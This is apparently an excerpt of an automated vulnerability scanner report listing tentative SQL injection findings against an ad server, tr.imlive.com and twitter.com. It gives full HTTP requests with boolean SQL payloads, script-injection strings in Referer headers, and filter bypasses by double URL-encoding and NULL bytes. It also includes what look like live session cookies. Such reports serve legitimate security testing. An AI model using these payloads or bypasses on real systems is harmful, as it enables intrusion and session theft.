p3p: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: Tue, 01 Jan 2008 00:12:30 GMT
Cache-control: private
Set-Cookie: cd=false; Domain=.rubiconproject.com; Expires=Sat, 28-Jan-2012 17:02:01 GMT; Path=/
Set-Cookie: dq=15|4|11|0; Expires=Sat, 28-Jan-2012 17:02:01 GMT; Path=/
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8

Request 2

GET /oz/sensor?p=rubicon&pc=5804/7477&cd=false&xt=17&k=photos:102,5+wrinkle:64,daily+news:64,wrinkle+trick:64,77+hr:64,dallas+mom's:64,mom's+5:64,dallas+local:64,makes+77:64,mom+makes:64,local+mom:64,photo:55,dallas:48,news:42,stars:32,dallas+mom:32,look+phenomenal:32,caught+without:32,without+makeup:32,stars+caught:32,player+news:32,life+style:32,news+front:32,red+carpet:32,daily+new:32,mom+make:32,star:26,2011:24,high+school:24,honored+tradition:24,sundance+film:24,film+festival:24,festival+2011:24,time+honored:24,dalla:24,sunny+socal:24,stars+leave:24,leave+sunny:24,2011+daily:24,new:21,&rd=burp&t=Page+Not+Found HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/blogs70f75'%3balert(1)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GIP9HWY4-MADS-10.208.38.239'%20and%201%3d2--%20; put_1197=3271971346728586924; put_1994=6ch47d7o8wtv; xdp_ti="26 Jan 2011 20:13:41 GMT"; put_1523=MDo0lVW4JKDM6LrVGjt5veKcuBH63bWQ; khaos=GIPAEQ2D-C-IOYY; ruid=154d290e46adc1d6f373dd09^5^1296224069^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3UdIwsGOQ/PP8TzZUxGDmBad2r6N25AKxdPo9e; put_2025=38f8a1ac-1e96-40c8-8d5e-172234bf5f5f; put_1512=4d3702bc-839e-0690-5370-3c19a9561295; put_1430=e6f6dead-6db2-4b47-a015-f587315583eb; put_1902=CfTKz1vxnM4Qo87LXqXVyg71y5oQqc-aCvFBOBEd; put_2081=CA-00000000456885722; cd=false; dq=14|4|10|0; lm="28 Jan 2011 14:48:45 GMT"; put_2101=82d726c3-44ee-407c-85c4-39a0b0fc11ef; rdk15=0; ses15=7477^6; csi15=3174529.js^2^1296226115^1296226129&3187311.js^2^1296226114^1296226127&3173809.js^1^1296224076^1296224076&3178297.js^1^1296224073^1296224073; put_1185=3011330574290390485; rdk=5804/7477; rdk2=0; ses2=7477^6; csi2=3138805.js^2^1296224077^1296226130&3174527.js^2^1296226121^1296226125&3178295.js^1^1296226112^1296226112; put_1986=4760492999213801733; rpb=4214%3D1%264894%3D1%264939%3D1%262399%3D1%263615%3D1%264940%3D1%262372%3D1%263169%3D1%262200%3D1%262374%3D1%265574%3D1%264210%3D1%265328%3D1%264554%3D1%265671%3D1%265852%3D1%264212%3D1%266286%3D1; put_2132=D8DB51BF08484217F5D14AB47F4002AD

Response 2

HTTP/1.1 204 No Content
Date: Fri, 28 Jan 2011 17:02:01 GMT
Server: TRP Apache-Coyote/1.1
Cache-Control: no-store, no-cache, must-revalidate
Cache-control: private
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8


1.26. http://tap.rubiconproject.com/oz/sensor [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://tap.rubiconproject.com
Path:   /oz/sensor

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 19372086%20or%201%3d1--%20 and 19372086%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /oz/sensor?p=rubicon&pc=5804/7477&cd=false&xt=15&k=photos:102,daily+news:64,photo:55,news:42,red+carpet:32,news+front:32,life+style:32,stars:32,daily+new:32,player+news:32,stars+caught:32,without+makeup:32,caught+without:32,look+phenomenal:32,star:26,2011+daily:24,leave+sunny:24,stars+leave:24,2011:24,high+school:24,time+honored:24,festival+2011:24,film+festival:24,sundance+film:24,sunny+socal:24,honored+tradition:24,new:21,submit:20,daily:20,sports:20,blogs:18,celebrity:16,world:16,errorpage:16,columnists:14,fashion:14,celebs:14,time:14,blog:13,caught:12,&rd=burp&t=Page+Not+Found&119372086%20or%201%3d1--%20=1 HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/blogs70f75'%3balert(document.cookie)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GIP9HWY4-MADS-10.208.38.239; put_1197=3271971346728586924; put_1986=4760492999213801733; put_1902=CfTKz1vxnM4Qo87LXqXVyg71y5oQqc-aCvFBOBEd; put_2081=CA-00000000456885722; put_1994=6ch47d7o8wtv; cd=false; dq=11|2|9|0; xdp_ti="26 Jan 2011 20:13:41 GMT"; lm="26 Jan 2011 20:13:41 GMT"; put_1523=MDo0lVW4JKDM6LrVGjt5veKcuBH63bWQ; khaos=GIPAEQ2D-C-IOYY; put_1185=3011330574290390485; ruid=154d290e46adc1d6f373dd09^5^1296224069^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3UdIwsGOQ/PP8TzZUxGDmBad2r6N25AKxdPo9e; put_2025=38f8a1ac-1e96-40c8-8d5e-172234bf5f5f; ses15=7477^2; csi15=3173809.js^1^1296224076^1296224076&3178297.js^1^1296224073^1296224073; rdk=5804/7477; ses2=7477^2; csi2=3138805.js^1^1296224077^1296224077; put_1512=4d3702bc-839e-0690-5370-3c19a9561295; rpb=4214%3D1%264894%3D1%264939%3D1%265671%3D1%262399%3D1%263615%3D1%264940%3D1%262372%3D1%263169%3D1%262200%3D1%262374%3D1%265574%3D1%264210%3D1%264212%3D1%265328%3D1%264554%3D1; put_1430=e6f6dead-6db2-4b47-a015-f587315583eb

Response 1

HTTP/1.1 204 No Content
Date: Fri, 28 Jan 2011 17:02:09 GMT
Server: TRP Apache-Coyote/1.1
p3p: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: Tue, 01 Jan 2008 00:12:30 GMT
Cache-control: private
Set-Cookie: cd=false; Domain=.rubiconproject.com; Expires=Sat, 28-Jan-2012 17:02:10 GMT; Path=/
Set-Cookie: dq=12|2|10|0; Expires=Sat, 28-Jan-2012 17:02:10 GMT; Path=/
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8

Request 2

GET /oz/sensor?p=rubicon&pc=5804/7477&cd=false&xt=15&k=photos:102,daily+news:64,photo:55,news:42,red+carpet:32,news+front:32,life+style:32,stars:32,daily+new:32,player+news:32,stars+caught:32,without+makeup:32,caught+without:32,look+phenomenal:32,star:26,2011+daily:24,leave+sunny:24,stars+leave:24,2011:24,high+school:24,time+honored:24,festival+2011:24,film+festival:24,sundance+film:24,sunny+socal:24,honored+tradition:24,new:21,submit:20,daily:20,sports:20,blogs:18,celebrity:16,world:16,errorpage:16,columnists:14,fashion:14,celebs:14,time:14,blog:13,caught:12,&rd=burp&t=Page+Not+Found&119372086%20or%201%3d2--%20=1 HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/blogs70f75'%3balert(document.cookie)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GIP9HWY4-MADS-10.208.38.239; put_1197=3271971346728586924; put_1986=4760492999213801733; put_1902=CfTKz1vxnM4Qo87LXqXVyg71y5oQqc-aCvFBOBEd; put_2081=CA-00000000456885722; put_1994=6ch47d7o8wtv; cd=false; dq=11|2|9|0; xdp_ti="26 Jan 2011 20:13:41 GMT"; lm="26 Jan 2011 20:13:41 GMT"; put_1523=MDo0lVW4JKDM6LrVGjt5veKcuBH63bWQ; khaos=GIPAEQ2D-C-IOYY; put_1185=3011330574290390485; ruid=154d290e46adc1d6f373dd09^5^1296224069^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3UdIwsGOQ/PP8TzZUxGDmBad2r6N25AKxdPo9e; put_2025=38f8a1ac-1e96-40c8-8d5e-172234bf5f5f; ses15=7477^2; csi15=3173809.js^1^1296224076^1296224076&3178297.js^1^1296224073^1296224073; rdk=5804/7477; ses2=7477^2; csi2=3138805.js^1^1296224077^1296224077; put_1512=4d3702bc-839e-0690-5370-3c19a9561295; rpb=4214%3D1%264894%3D1%264939%3D1%265671%3D1%262399%3D1%263615%3D1%264940%3D1%262372%3D1%263169%3D1%262200%3D1%262374%3D1%265574%3D1%264210%3D1%264212%3D1%265328%3D1%264554%3D1; put_1430=e6f6dead-6db2-4b47-a015-f587315583eb

Response 2

HTTP/1.1 204 No Content
Date: Fri, 28 Jan 2011 17:02:10 GMT
Server: TRP Apache-Coyote/1.1
Cache-Control: no-store, no-cache, must-revalidate
Cache-control: private
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8


1.27. http://tap.rubiconproject.com/oz/sensor [pc parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://tap.rubiconproject.com
Path:   /oz/sensor

Issue detail

The pc parameter appears to be vulnerable to SQL injection attacks. The payloads 20312360'%20or%201%3d1--%20 and 20312360'%20or%201%3d2--%20 were each submitted in the pc parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /oz/sensor?p=rubicon&pc=5804/747720312360'%20or%201%3d1--%20&cd=false&xt=15&k=photos:102,daily+news:64,photo:55,news:42,red+carpet:32,news+front:32,life+style:32,stars:32,daily+new:32,player+news:32,stars+caught:32,without+makeup:32,caught+without:32,look+phenomenal:32,star:26,2011+daily:24,leave+sunny:24,stars+leave:24,2011:24,high+school:24,time+honored:24,festival+2011:24,film+festival:24,sundance+film:24,sunny+socal:24,honored+tradition:24,new:21,submit:20,daily:20,sports:20,blogs:18,celebrity:16,world:16,errorpage:16,columnists:14,fashion:14,celebs:14,time:14,blog:13,caught:12,&rd=burp&t=Page+Not+Found HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/blogs70f75'%3balert(document.cookie)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GIP9HWY4-MADS-10.208.38.239; put_1197=3271971346728586924; put_1986=4760492999213801733; put_1902=CfTKz1vxnM4Qo87LXqXVyg71y5oQqc-aCvFBOBEd; put_2081=CA-00000000456885722; put_1994=6ch47d7o8wtv; cd=false; dq=11|2|9|0; xdp_ti="26 Jan 2011 20:13:41 GMT"; lm="26 Jan 2011 20:13:41 GMT"; put_1523=MDo0lVW4JKDM6LrVGjt5veKcuBH63bWQ; khaos=GIPAEQ2D-C-IOYY; put_1185=3011330574290390485; ruid=154d290e46adc1d6f373dd09^5^1296224069^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3UdIwsGOQ/PP8TzZUxGDmBad2r6N25AKxdPo9e; put_2025=38f8a1ac-1e96-40c8-8d5e-172234bf5f5f; ses15=7477^2; csi15=3173809.js^1^1296224076^1296224076&3178297.js^1^1296224073^1296224073; rdk=5804/7477; ses2=7477^2; csi2=3138805.js^1^1296224077^1296224077; put_1512=4d3702bc-839e-0690-5370-3c19a9561295; rpb=4214%3D1%264894%3D1%264939%3D1%265671%3D1%262399%3D1%263615%3D1%264940%3D1%262372%3D1%263169%3D1%262200%3D1%262374%3D1%265574%3D1%264210%3D1%264212%3D1%265328%3D1%264554%3D1; put_1430=e6f6dead-6db2-4b47-a015-f587315583eb

Response 1

HTTP/1.1 204 No Content
Date: Fri, 28 Jan 2011 17:01:38 GMT
Server: TRP Apache-Coyote/1.1
p3p: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: Tue, 01 Jan 2008 00:12:30 GMT
Cache-control: private
Set-Cookie: cd=false; Domain=.rubiconproject.com; Expires=Sat, 28-Jan-2012 17:01:38 GMT; Path=/
Set-Cookie: dq=12|2|10|0; Expires=Sat, 28-Jan-2012 17:01:38 GMT; Path=/
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8

Request 2

GET /oz/sensor?p=rubicon&pc=5804/747720312360'%20or%201%3d2--%20&cd=false&xt=15&k=photos:102,daily+news:64,photo:55,news:42,red+carpet:32,news+front:32,life+style:32,stars:32,daily+new:32,player+news:32,stars+caught:32,without+makeup:32,caught+without:32,look+phenomenal:32,star:26,2011+daily:24,leave+sunny:24,stars+leave:24,2011:24,high+school:24,time+honored:24,festival+2011:24,film+festival:24,sundance+film:24,sunny+socal:24,honored+tradition:24,new:21,submit:20,daily:20,sports:20,blogs:18,celebrity:16,world:16,errorpage:16,columnists:14,fashion:14,celebs:14,time:14,blog:13,caught:12,&rd=burp&t=Page+Not+Found HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/blogs70f75'%3balert(document.cookie)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GIP9HWY4-MADS-10.208.38.239; put_1197=3271971346728586924; put_1986=4760492999213801733; put_1902=CfTKz1vxnM4Qo87LXqXVyg71y5oQqc-aCvFBOBEd; put_2081=CA-00000000456885722; put_1994=6ch47d7o8wtv; cd=false; dq=11|2|9|0; xdp_ti="26 Jan 2011 20:13:41 GMT"; lm="26 Jan 2011 20:13:41 GMT"; put_1523=MDo0lVW4JKDM6LrVGjt5veKcuBH63bWQ; khaos=GIPAEQ2D-C-IOYY; put_1185=3011330574290390485; ruid=154d290e46adc1d6f373dd09^5^1296224069^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3UdIwsGOQ/PP8TzZUxGDmBad2r6N25AKxdPo9e; put_2025=38f8a1ac-1e96-40c8-8d5e-172234bf5f5f; ses15=7477^2; csi15=3173809.js^1^1296224076^1296224076&3178297.js^1^1296224073^1296224073; rdk=5804/7477; ses2=7477^2; csi2=3138805.js^1^1296224077^1296224077; put_1512=4d3702bc-839e-0690-5370-3c19a9561295; rpb=4214%3D1%264894%3D1%264939%3D1%265671%3D1%262399%3D1%263615%3D1%264940%3D1%262372%3D1%263169%3D1%262200%3D1%262374%3D1%265574%3D1%264210%3D1%264212%3D1%265328%3D1%264554%3D1; put_1430=e6f6dead-6db2-4b47-a015-f587315583eb

Response 2

HTTP/1.1 204 No Content
Date: Fri, 28 Jan 2011 17:01:38 GMT
Server: TRP Apache-Coyote/1.1
Cache-Control: no-store, no-cache, must-revalidate
Cache-control: private
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8


1.28. http://tr.imlive.com/waccess/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://tr.imlive.com
Path:   /waccess/

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /waccess%2527/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1
Host: tr.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 500 Server Error
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:25:47 GMT
Connection: close
Content-Length: 63
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/

<html><body><h1> HTTP/1.1 New Session Failed</h1></body></html>

Request 2

GET /waccess%2527%2527/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1
Host: tr.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:25:48 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ix=k; path=/
Set-Cookie: itr=3hJF2uAprPZVGf42Zwr0ekr2sY1ahZftnoTx9yuEyyIqvJvUlzC7C5ClUj1mImMy0aC%2BOSFmyeUpZNslxkObl7I0cWS0PuZU%2FREf%2ByHeMVk%3D; path=/
Set-Cookie: ASPSESSIONIDSQRTRBSD=FAKPGKMALJJINONJKHHPMGGB; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:25:47 GMT
Connection: close
Content-Length: 8333
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/


<HTML>
<HEAD>
<meta name=vs_targetSchema content="http://schemas.microsoft.com/intellisense/ie5">
<title>ImLive.com - Page Not Found</title>

<link rel="stylesheet" type="text/css" href="http
...[SNIP]...

1.29. http://tr.imlive.com/waccess/ [gotopage parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://tr.imlive.com
Path:   /waccess/

Issue detail

The gotopage parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the gotopage parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the gotopage request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/%2527 HTTP/1.1
Host: tr.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1 (redirected)

HTTP/1.1 500 Server Error
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:31:40 GMT
Connection: close
Content-Length: 63
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/

<html><body><h1> HTTP/1.1 New Session Failed</h1></body></html>

Request 2

GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/%2527%2527 HTTP/1.1
Host: tr.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2 (redirected)

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:31:40 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ix=k; path=/
Set-Cookie: itr=3hJF2uAprPZVGf42Zwr0ekr2sY1ahZftnoTx9yuEyyIqvJvUlzC7C5ClUj1mImMy0aC%2BOSFmyeUpZNslxkObl7I0cWS0PuZU%2FREf%2ByHeMVk%3D; path=/
Set-Cookie: ASPSESSIONIDSQRTRBSD=ABKPGKMAHOCFOJMDCOENFMKF; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:31:40 GMT
Connection: close
Content-Length: 8250
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/


<HTML>
<HEAD>
<meta name=vs_targetSchema content="http://schemas.microsoft.com/intellisense/ie5">
<title>ImLive.com - Page Not Found</title>

<link rel="stylesheet" type="text/css" href="http
...[SNIP]...

1.30. http://twitter.com/ [Referer HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://twitter.com
Path:   /

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET / HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;
Referer: http://www.google.com/search?hl=en&q=%00'

Response 1

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:32:14 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225134-78066-61608
ETag: "d607d45a9b9b35bf9e842e32301673c1"
Last-Modified: Fri, 28 Jan 2011 14:32:14 GMT
X-Runtime: 0.00992
Content-Type: text/html; charset=utf-8
Content-Length: 44338
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCDNO8MwtAToHaWQiJTFjOTUzNDgxYTQyZmRl%250AOWMwYzc0YWVkNTc5MWYyZjY0IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--a8f223ad45d09367559f519bdad491ac222063d2; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=8">
<meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...
<img alt="" border="0" height="48" src="http://a1.twimg.com/profile_images/114763578/logoStackedBlack_normal.jpg" style="vertical-align:middle" width="48" />
...[SNIP]...

Request 2

GET / HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;
Referer: http://www.google.com/search?hl=en&q=%00''

Response 2

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:32:15 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225135-14261-45141
ETag: "9605f681076d2ce0929285f2a3ef830b"
Last-Modified: Fri, 28 Jan 2011 14:32:15 GMT
X-Runtime: 0.01078
Content-Type: text/html; charset=utf-8
Content-Length: 44355
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCDNO8MwtAToHaWQiJTFjOTUzNDgxYTQyZmRl%250AOWMwYzc0YWVkNTc5MWYyZjY0IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--a8f223ad45d09367559f519bdad491ac222063d2; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=8">
<meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...

1.31. http://twitter.com/ [original_referer cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://twitter.com
Path:   /

Issue detail

The original_referer cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the original_referer cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /?status=@ HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa'; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response 1

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 17:06:59 GMT
